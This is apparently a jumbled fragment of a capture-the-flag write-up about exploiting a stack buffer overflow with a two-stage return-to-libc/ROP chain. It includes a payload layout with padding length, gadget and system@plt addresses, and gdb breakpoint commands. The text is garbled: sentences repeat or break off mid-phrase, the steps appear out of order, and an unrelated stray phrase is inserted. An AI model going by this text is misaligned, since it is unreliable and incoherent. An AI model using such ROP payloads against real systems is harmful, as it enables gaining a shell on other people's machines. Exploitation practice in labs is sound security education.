Second payload (sent after the program restarts at main):
[padding (72)]
pop rdi ; ret -> 0x4014b3
<binsh_addr> -> address of "/bin/sh" in libc
system@plt -> 0x4006b0
No need for a further return; after system we get an interactive shell. midv699 full
Using gdb:
(gdb) r
(gdb) break *0x0040145a # after the vulnerable read returns
(gdb) run
After sending >64 bytes we see the saved RIP overwritten with our data. Second payload (sent after the program restarts at
Thus, a simple return‑to‑libc or ROP attack can be used. No need for a further return; after system
The binary ships with its own libc (libc.so.6). Because NX is on, we cannot inject shellcode. The easiest path is:
The binary already has a puts@plt, so we can build a first stage that prints the address stored in the GOT for puts. The second stage then calls system.